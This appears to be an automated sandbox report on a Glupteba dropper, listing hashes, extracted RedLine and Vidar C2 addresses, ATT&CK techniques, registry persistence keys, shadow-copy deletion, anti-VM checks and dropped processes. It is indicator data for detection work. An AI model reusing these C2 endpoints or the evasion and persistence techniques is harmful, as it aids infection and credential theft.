glupteba | 1cd649ea4273fd977b6a350bfe8f3b62f1d0aee1408b9966aa3d6ad39ba5af6a

Target

Setup (8).exe
Size

631KB
MD5

cb927513ff8ebff4dd52a47f7e42f934
SHA1

0de47c02a8adc4940a6c18621b4e4a619641d029
SHA256

fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
SHA512

988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

supertraff

135.148.139.222:1494

Extracted

Family

redline

Botnet

dibild2

135.148.139.222:1494

Extracted

Family

redline

Botnet

195.2.78.163:25450

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

vidar

Version

40.1

Botnet

937

https://eduarroma.tumblr.com/

Attributes

profile_id
937

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 1 IoCs

Processes:

resource	yara_rule
behavioral30/memory/2732-388-0x00000000051F0000-0x0000000005B16000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport

Process spawned unexpected child process 4 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exerundll32.exerundll32.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6980	188	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8676	188	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	684	188	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3540	188	rundll32.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 7 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Documents\0ZvtfMMtmei_r2LUhzD6s3nl.exe	family_redline
C:\Users\Admin\Documents\0ZvtfMMtmei_r2LUhzD6s3nl.exe	family_redline
behavioral30/memory/1964-280-0x000000000041A616-mapping.dmp	family_redline
behavioral30/memory/1964-277-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral30/memory/4296-275-0x0000000000FA0000-0x0000000000FBB000-memory.dmp	family_redline
behavioral30/memory/4912-314-0x000000000041A76A-mapping.dmp	family_redline
behavioral30/memory/5240-521-0x000000000041A61A-mapping.dmp	family_redline

Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral30/memory/1904-376-0x0000000002E50000-0x0000000002F9A000-memory.dmp	family_vidar
behavioral30/memory/1904-396-0x0000000000400000-0x0000000002D1A000-memory.dmp	family_vidar

Blocklisted process makes network request 5 IoCs

Processes:

cmd.execmd.exe

flow pid process

149 4228 cmd.exe
152 4584 cmd.exe
155 4228 cmd.exe
156 4228 cmd.exe
158 4584 cmd.exe
Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

flow	pid	process
149	4228	cmd.exe
152	4584	cmd.exe
155	4228	cmd.exe
156	4228	cmd.exe
158	4584	cmd.exe

Executes dropped EXE 41 IoCs

Processes:

DBquM9Ux3O2P6QTSM7bEyIJg.exetDNpWE8Ffr9I95g5rfOORzaj.exexuPTrPhG8LiTCCYkRU3l5dJn.exe0ZvtfMMtmei_r2LUhzD6s3nl.exetdLynNSjWDwoYV_NtVV9prtL.exeRAGsMRiGvQfHKGxdA_XdEHZ4.exetFAiejrvGkLA09uKG9VYjzE9.exe3IjmjaZKIJmptGbbtw1_D26A.exehqhJ93v2Sp2le8a1_PJ6h24Z.exegjBZerm3X6OG0IODIHvioyga.exeTjiAcqevqaAuG8f2vw40KD72.exePegYFqmYOCQQpBeo47YBAEF5.exeKxuucbJ_95kucQ9ETFrE7iPJ.exe4RzU7BiBxmLwffxRvpEDiZSm.exeAK8bFJ2kMHwvSgaE68geOqWe.exech4sEc_fJpwjttkGs9QqTu4a.exe7XRd6tmNRnvpvvsD9uVr8_2e.exeXeZ3UVKJj0F8nD1ajWBiOWIQ.exeRP11pnadhhUPl610oidJj8MQ.exeDz6v9cEoKfJYRw032bIvHe6r.exegd6uGJvHfRYMrGagBQn0wl2K.exeVO49JLlC8_Np40dUNpo8MwXg.exeAOrVfqejFU4lQIMMYFfynLWS.exetaskkill.exeEug40X9J7YAE5ZHuGHmAbQnS.execmd.exeoeAHcI58P5hXFE5b9fwcXmMF.exejooyu.exeEug40X9J7YAE5ZHuGHmAbQnS.tmpDBquM9Ux3O2P6QTSM7bEyIJg.exexuPTrPhG8LiTCCYkRU3l5dJn.execmd.exeDBquM9Ux3O2P6QTSM7bEyIJg.exeAK8bFJ2kMHwvSgaE68geOqWe.exe2305080.exe3814353.exe7330230.exe2732743.exeWO~L~OYJWS8EVL1.eXeWinHoster.exetdLynNSjWDwoYV_NtVV9prtL.exe

pid	process
804	DBquM9Ux3O2P6QTSM7bEyIJg.exe
512	tDNpWE8Ffr9I95g5rfOORzaj.exe
420	xuPTrPhG8LiTCCYkRU3l5dJn.exe
652	0ZvtfMMtmei_r2LUhzD6s3nl.exe
856	tdLynNSjWDwoYV_NtVV9prtL.exe
4340	RAGsMRiGvQfHKGxdA_XdEHZ4.exe
4256	tFAiejrvGkLA09uKG9VYjzE9.exe
4296	3IjmjaZKIJmptGbbtw1_D26A.exe
296	hqhJ93v2Sp2le8a1_PJ6h24Z.exe
508	gjBZerm3X6OG0IODIHvioyga.exe
1028	TjiAcqevqaAuG8f2vw40KD72.exe
580	PegYFqmYOCQQpBeo47YBAEF5.exe
4228	KxuucbJ_95kucQ9ETFrE7iPJ.exe
1904	4RzU7BiBxmLwffxRvpEDiZSm.exe
1812	AK8bFJ2kMHwvSgaE68geOqWe.exe
2200	ch4sEc_fJpwjttkGs9QqTu4a.exe
2732	7XRd6tmNRnvpvvsD9uVr8_2e.exe
4416	XeZ3UVKJj0F8nD1ajWBiOWIQ.exe
4420	RP11pnadhhUPl610oidJj8MQ.exe
744	Dz6v9cEoKfJYRw032bIvHe6r.exe
3136	gd6uGJvHfRYMrGagBQn0wl2K.exe
3860	VO49JLlC8_Np40dUNpo8MwXg.exe
972	AOrVfqejFU4lQIMMYFfynLWS.exe
3836	taskkill.exe
3796	Eug40X9J7YAE5ZHuGHmAbQnS.exe
4584	cmd.exe
4528	oeAHcI58P5hXFE5b9fwcXmMF.exe
3752	jooyu.exe
4136	Eug40X9J7YAE5ZHuGHmAbQnS.tmp
3192	DBquM9Ux3O2P6QTSM7bEyIJg.exe
1964	xuPTrPhG8LiTCCYkRU3l5dJn.exe
3912	cmd.exe
4912	DBquM9Ux3O2P6QTSM7bEyIJg.exe
3152	AK8bFJ2kMHwvSgaE68geOqWe.exe
4672	2305080.exe
804	3814353.exe
4040	7330230.exe
3756	2732743.exe
2812	WO~L~OYJWS8EVL1.eXe
1128	WinHoster.exe
2616	tdLynNSjWDwoYV_NtVV9prtL.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

TjiAcqevqaAuG8f2vw40KD72.exePegYFqmYOCQQpBeo47YBAEF5.exegd6uGJvHfRYMrGagBQn0wl2K.exeRAGsMRiGvQfHKGxdA_XdEHZ4.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TjiAcqevqaAuG8f2vw40KD72.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	PegYFqmYOCQQpBeo47YBAEF5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	PegYFqmYOCQQpBeo47YBAEF5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	gd6uGJvHfRYMrGagBQn0wl2K.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	gd6uGJvHfRYMrGagBQn0wl2K.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RAGsMRiGvQfHKGxdA_XdEHZ4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RAGsMRiGvQfHKGxdA_XdEHZ4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TjiAcqevqaAuG8f2vw40KD72.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Setup (8).exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Setup (8).exe

Loads dropped DLL 3 IoCs

Processes:

3IjmjaZKIJmptGbbtw1_D26A.exeEug40X9J7YAE5ZHuGHmAbQnS.tmp

pid process

4296 3IjmjaZKIJmptGbbtw1_D26A.exe
4136 Eug40X9J7YAE5ZHuGHmAbQnS.tmp
4136 Eug40X9J7YAE5ZHuGHmAbQnS.tmp
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
4296	3IjmjaZKIJmptGbbtw1_D26A.exe
4136	Eug40X9J7YAE5ZHuGHmAbQnS.tmp
4136	Eug40X9J7YAE5ZHuGHmAbQnS.tmp

Themida packer 12 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Documents\TjiAcqevqaAuG8f2vw40KD72.exe	themida
C:\Users\Admin\Documents\PegYFqmYOCQQpBeo47YBAEF5.exe	themida
C:\Users\Admin\Documents\RAGsMRiGvQfHKGxdA_XdEHZ4.exe	themida
C:\Users\Admin\Documents\RAGsMRiGvQfHKGxdA_XdEHZ4.exe	themida
C:\Users\Admin\Documents\TjiAcqevqaAuG8f2vw40KD72.exe	themida
C:\Users\Admin\Documents\PegYFqmYOCQQpBeo47YBAEF5.exe	themida
C:\Users\Admin\Documents\gd6uGJvHfRYMrGagBQn0wl2K.exe	themida
C:\Users\Admin\Documents\gd6uGJvHfRYMrGagBQn0wl2K.exe	themida
behavioral30/memory/4340-254-0x0000000000B20000-0x0000000000B21000-memory.dmp	themida
behavioral30/memory/1028-260-0x0000000001130000-0x0000000001131000-memory.dmp	themida
behavioral30/memory/3136-265-0x0000000000BE0000-0x0000000000BE1000-memory.dmp	themida
behavioral30/memory/580-266-0x00000000009A0000-0x00000000009A1000-memory.dmp	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

3814353.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	3814353.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

TjiAcqevqaAuG8f2vw40KD72.exePegYFqmYOCQQpBeo47YBAEF5.exegd6uGJvHfRYMrGagBQn0wl2K.exeRAGsMRiGvQfHKGxdA_XdEHZ4.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	TjiAcqevqaAuG8f2vw40KD72.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	PegYFqmYOCQQpBeo47YBAEF5.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	gd6uGJvHfRYMrGagBQn0wl2K.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RAGsMRiGvQfHKGxdA_XdEHZ4.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 19 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
590	geoiptool.com
622	freegeoip.app
30	ipinfo.io
312	ipinfo.io
159	ipinfo.io
201	freegeoip.app
220	freegeoip.app
29	ipinfo.io
150	ip-api.com
369	ipinfo.io
371	ipinfo.io
623	freegeoip.app
207	freegeoip.app
221	ipinfo.io
222	ipinfo.io
310	ipinfo.io
311	ipinfo.io
161	ipinfo.io
204	freegeoip.app

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

RAGsMRiGvQfHKGxdA_XdEHZ4.exeTjiAcqevqaAuG8f2vw40KD72.exePegYFqmYOCQQpBeo47YBAEF5.exegd6uGJvHfRYMrGagBQn0wl2K.exe

pid process

4340 RAGsMRiGvQfHKGxdA_XdEHZ4.exe
1028 TjiAcqevqaAuG8f2vw40KD72.exe
580 PegYFqmYOCQQpBeo47YBAEF5.exe
3136 gd6uGJvHfRYMrGagBQn0wl2K.exe

pid	process
4340	RAGsMRiGvQfHKGxdA_XdEHZ4.exe
1028	TjiAcqevqaAuG8f2vw40KD72.exe
580	PegYFqmYOCQQpBeo47YBAEF5.exe
3136	gd6uGJvHfRYMrGagBQn0wl2K.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

xuPTrPhG8LiTCCYkRU3l5dJn.exe3814353.exetdLynNSjWDwoYV_NtVV9prtL.exe

description	pid	process	target process
PID 420 set thread context of 1964	420	xuPTrPhG8LiTCCYkRU3l5dJn.exe	xuPTrPhG8LiTCCYkRU3l5dJn.exe
PID 804 set thread context of 4912	804	3814353.exe	DBquM9Ux3O2P6QTSM7bEyIJg.exe
PID 856 set thread context of 2616	856	tdLynNSjWDwoYV_NtVV9prtL.exe	tdLynNSjWDwoYV_NtVV9prtL.exe

Drops file in Program Files directory 5 IoCs

Processes:

RP11pnadhhUPl610oidJj8MQ.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Company\NewProduct\customer3.exe	RP11pnadhhUPl610oidJj8MQ.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe	RP11pnadhhUPl610oidJj8MQ.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\jooyu.exe	RP11pnadhhUPl610oidJj8MQ.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	RP11pnadhhUPl610oidJj8MQ.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	RP11pnadhhUPl610oidJj8MQ.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 60 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
8	3860	WerFault.exe	VO49JLlC8_Np40dUNpo8MwXg.exe
4708	3860	WerFault.exe	VO49JLlC8_Np40dUNpo8MwXg.exe
304	3860	WerFault.exe	VO49JLlC8_Np40dUNpo8MwXg.exe
4392	3860	WerFault.exe	VO49JLlC8_Np40dUNpo8MwXg.exe
5548	1904	WerFault.exe	4RzU7BiBxmLwffxRvpEDiZSm.exe
5784	2732	WerFault.exe	7XRd6tmNRnvpvvsD9uVr8_2e.exe
5840	1904	WerFault.exe	4RzU7BiBxmLwffxRvpEDiZSm.exe
5964	2732	WerFault.exe	7XRd6tmNRnvpvvsD9uVr8_2e.exe
5972	1904	WerFault.exe	4RzU7BiBxmLwffxRvpEDiZSm.exe
6020	3860	WerFault.exe	VO49JLlC8_Np40dUNpo8MwXg.exe
1300	1904	WerFault.exe	4RzU7BiBxmLwffxRvpEDiZSm.exe
5156	2732	WerFault.exe	7XRd6tmNRnvpvvsD9uVr8_2e.exe
5404	1904	WerFault.exe	4RzU7BiBxmLwffxRvpEDiZSm.exe
4332	2732	WerFault.exe	7XRd6tmNRnvpvvsD9uVr8_2e.exe
5552	1904	WerFault.exe	4RzU7BiBxmLwffxRvpEDiZSm.exe
3312	2732	WerFault.exe	7XRd6tmNRnvpvvsD9uVr8_2e.exe
3124	1904	WerFault.exe	4RzU7BiBxmLwffxRvpEDiZSm.exe
5704	1904	WerFault.exe	4RzU7BiBxmLwffxRvpEDiZSm.exe
5572	2732	WerFault.exe	7XRd6tmNRnvpvvsD9uVr8_2e.exe
5704	1904	WerFault.exe	4RzU7BiBxmLwffxRvpEDiZSm.exe
6596	2732	WerFault.exe	7XRd6tmNRnvpvvsD9uVr8_2e.exe
6812	1904	WerFault.exe	4RzU7BiBxmLwffxRvpEDiZSm.exe
6152	2732	WerFault.exe	7XRd6tmNRnvpvvsD9uVr8_2e.exe
1544	5356	WerFault.exe	runvd.exe
6492	1904	WerFault.exe	4RzU7BiBxmLwffxRvpEDiZSm.exe
7344	5356	WerFault.exe	runvd.exe
7632	6568	WerFault.exe	8WaJfGpDfFvIhvMuZKnmp1sN.exe
7328	1904	WerFault.exe	4RzU7BiBxmLwffxRvpEDiZSm.exe
7572	6568	WerFault.exe	8WaJfGpDfFvIhvMuZKnmp1sN.exe
7096	5356	WerFault.exe	runvd.exe
6260	6568	WerFault.exe	8WaJfGpDfFvIhvMuZKnmp1sN.exe
7792	5356	WerFault.exe	runvd.exe
7088	6568	WerFault.exe	8WaJfGpDfFvIhvMuZKnmp1sN.exe
7432	5356	WerFault.exe	runvd.exe
7608	5356	WerFault.exe	runvd.exe
6804	5356	WerFault.exe	runvd.exe
6036	7060	WerFault.exe	qpzkGGuOBrjZb5PWRo3HnEAz.exe
6784	5356	WerFault.exe	runvd.exe
6652	7060	WerFault.exe	qpzkGGuOBrjZb5PWRo3HnEAz.exe
6416	7108	WerFault.exe	o19lZiYeWGvykP0vx74LJqKo.exe
6300	7060	WerFault.exe	qpzkGGuOBrjZb5PWRo3HnEAz.exe
6132	7060	WerFault.exe	qpzkGGuOBrjZb5PWRo3HnEAz.exe
6804	7108	WerFault.exe	o19lZiYeWGvykP0vx74LJqKo.exe
8288	8080	WerFault.exe	8690626576.exe
8464	7108	WerFault.exe	o19lZiYeWGvykP0vx74LJqKo.exe
8588	7060	WerFault.exe	qpzkGGuOBrjZb5PWRo3HnEAz.exe
8632	8080	WerFault.exe	8690626576.exe
8824	8080	WerFault.exe	8690626576.exe
8880	7108	WerFault.exe	o19lZiYeWGvykP0vx74LJqKo.exe
9108	5356	WerFault.exe	runvd.exe
9200	7108	WerFault.exe	o19lZiYeWGvykP0vx74LJqKo.exe
6464	7108	WerFault.exe	o19lZiYeWGvykP0vx74LJqKo.exe
8516	5356	WerFault.exe	runvd.exe
8644	7108	WerFault.exe	o19lZiYeWGvykP0vx74LJqKo.exe
8588	7108	WerFault.exe	o19lZiYeWGvykP0vx74LJqKo.exe
8824	7060	WerFault.exe	qpzkGGuOBrjZb5PWRo3HnEAz.exe
6864	8080	WerFault.exe	8690626576.exe
6096	5356	WerFault.exe	runvd.exe
2288	5356	WerFault.exe	runvd.exe
8716	7060	WerFault.exe	qpzkGGuOBrjZb5PWRo3HnEAz.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

PBrowFile15.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	PBrowFile15.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	PBrowFile15.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	PBrowFile15.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

6528 schtasks.exe
9760 schtasks.exe
6660 schtasks.exe
5660 schtasks.exe
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exe

pid process

11224 vssadmin.exe
9680 vssadmin.exe
Kills process with taskkill 8 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

3836 taskkill.exe
5048 taskkill.exe
6624 taskkill.exe
10236 taskkill.exe
8424 taskkill.exe
5228 taskkill.exe
5432 taskkill.exe
5536 taskkill.exe

pid	process
6528	schtasks.exe
9760	schtasks.exe
6660	schtasks.exe
5660	schtasks.exe

pid	process
11224	vssadmin.exe
9680	vssadmin.exe

pid	process
3836	taskkill.exe
5048	taskkill.exe
6624	taskkill.exe
10236	taskkill.exe
8424	taskkill.exe
5228	taskkill.exe
5432	taskkill.exe
5536	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Setup (8).exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Setup (8).exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Setup (8).exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXE

pid process

9476 PING.EXE
10400 PING.EXE
2044 PING.EXE

pid	process
9476	PING.EXE
10400	PING.EXE
2044	PING.EXE

Script User-Agent 8 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	161	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	166	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	301	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	302	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	303	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	370	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	372	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	160	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Setup (8).exeWerFault.exeWerFault.exeWerFault.exePBrowFile15.exeWerFault.exe

pid	process
4448	Setup (8).exe
4448	Setup (8).exe
8	WerFault.exe
8	WerFault.exe
8	WerFault.exe
8	WerFault.exe
8	WerFault.exe
8	WerFault.exe
8	WerFault.exe
8	WerFault.exe
8	WerFault.exe
8	WerFault.exe
8	WerFault.exe
8	WerFault.exe
8	WerFault.exe
8	WerFault.exe
8	WerFault.exe
8	WerFault.exe
8	WerFault.exe
8	WerFault.exe
8	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
304	WerFault.exe
304	WerFault.exe
304	WerFault.exe
304	WerFault.exe
304	WerFault.exe
304	WerFault.exe
304	WerFault.exe
304	WerFault.exe
304	WerFault.exe
304	WerFault.exe
304	WerFault.exe
304	WerFault.exe
304	WerFault.exe
304	WerFault.exe
304	WerFault.exe
304	WerFault.exe
304	WerFault.exe
304	WerFault.exe
304	WerFault.exe
304	WerFault.exe
4256	PBrowFile15.exe
4256	PBrowFile15.exe
4392	WerFault.exe
4392	WerFault.exe

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

3IjmjaZKIJmptGbbtw1_D26A.exehqhJ93v2Sp2le8a1_PJ6h24Z.execmd.exeWerFault.exeRAGsMRiGvQfHKGxdA_XdEHZ4.exeWerFault.exeDBquM9Ux3O2P6QTSM7bEyIJg.exe0ZvtfMMtmei_r2LUhzD6s3nl.exexuPTrPhG8LiTCCYkRU3l5dJn.exeTjiAcqevqaAuG8f2vw40KD72.exegd6uGJvHfRYMrGagBQn0wl2K.exePegYFqmYOCQQpBeo47YBAEF5.exe2305080.exeWerFault.exe2732743.exeWerFault.exe

description	pid	process
Token: SeDebugPrivilege	4296	3IjmjaZKIJmptGbbtw1_D26A.exe
